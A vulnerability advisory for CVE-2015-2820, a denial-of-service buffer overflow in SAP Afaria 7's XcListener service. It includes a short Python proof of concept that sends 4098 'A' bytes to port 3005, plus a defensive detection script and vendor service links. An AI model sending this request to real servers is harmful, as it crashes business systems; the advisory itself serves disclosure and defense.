Application: SAP Afaria 7.0.6001.5
Vendor URL: http://www.sap.com
Bugs: BoF
Reported: 09.12.2014
Vendor response: 10.12.2014
Date of Public Advisory: 15.03.2015
Reference: SAP Security Note 2132584
Author: Vahagn Vardanyan (ERPScan)
Class: DoS [CWE-400]
Impact: DoS
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-2820
It is possible to use denial of service to terminate the process of the vulnerable component. As a result, nobody can use this service, which has a negative influence on business processes. System downtime also harms business reputation.
An anonymous attacker can use a special request to crash the XcListener process on the server.
VULNERABLE PACKAGES
SAP Afaria 7
Other versions are probably affected too, but they were not checked.
A vulnerability has been discovered in certain landscape configurations of SAP Afaria that utilize XcListener for initiating client-to-server communications. SAP has released security patches for the vulnerable clients, Windows Mobile, Windows CE, and Windows. Windows Phone is not affected. SAP strongly recommends that customers patch their servers.
An anonymous attacker can use a special request to crash the XcListener process on the server.
```python
import socket

HOST = AFARIA_IP  # The remote host
PORT = 3005  # The same port as used by the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
PoC = 'A'*4098
s.send(PoC)
data = s.recv(1024)
s.close()
print 'Received', (data)
```
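A defender-side check for the request shape shown in the PoC, as an added example that is not part of the original advisory: it flags first payloads sent to port 3005 that are both oversized and dominated by a single byte value. The 4096-byte threshold, the 0.9 dominance ratio and the flow-tuple format are assumptions to tune against real traffic.

```python
from collections import Counter

XCLISTENER_PORT = 3005   # port used by the PoC on this page
MIN_LEN = 4096           # assumption: alert threshold, tune to real traffic
MIN_DOMINANCE = 0.9      # assumption: share of payload held by one byte value


def dominant_byte_share(payload: bytes) -> float:
    """Fraction of the payload made up of its most common byte value."""
    if not payload:
        return 0.0
    return Counter(payload).most_common(1)[0][1] / len(payload)


def is_suspicious(dst_port: int, payload: bytes) -> bool:
    """Flag oversized, near-uniform first payloads sent to XcListener."""
    return (
        dst_port == XCLISTENER_PORT
        and len(payload) >= MIN_LEN
        and dominant_byte_share(payload) >= MIN_DOMINANCE
    )


def scan(flows):
    """Return the source addresses of flagged flows, in input order."""
    return [src for src, port, payload in flows if is_suspicious(port, payload)]


# Constructed sample flows: (source address, destination port, first payload).
SAMPLE_FLOWS = [
    ("192.0.2.10", 3005, bytes(range(256)) * 20),  # large but varied content
    ("192.0.2.11", 3005, b"A" * 4098),             # shape of the PoC request
    ("192.0.2.12", 8080, b"A" * 4098),             # filler, but a different port
    ("192.0.2.13", 3005, b""),                     # connect with no data
    ("192.0.2.14", 3005, b"B" * 100),              # uniform but short
]

if __name__ == "__main__":
    for src in scan(SAMPLE_FLOWS):
        print("oversized uniform payload to XcListener from", src)
```
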
To prevent this issue as well as a plethora of other vulnerabilities that may affect your systems, ERPScan provides the following services:
* [SAP Vulnerability Assessment](<http://erpscan.com/services-2/sap-vulnerability-assessment/>)
* [SAP Security Assessment](<http://erpscan.com/services-2/sap-security-assessment/>)
* [SAP Security Trainings](<http://erpscan.com/services-2/sap-security-trainings/>)
* [SAP Custom code security review](<http://erpscan.com/services-2/sap-custom-code-security-review/>)
* [SAP Penetration testing](<http://erpscan.com/services-2/sap-penetration-testing/>)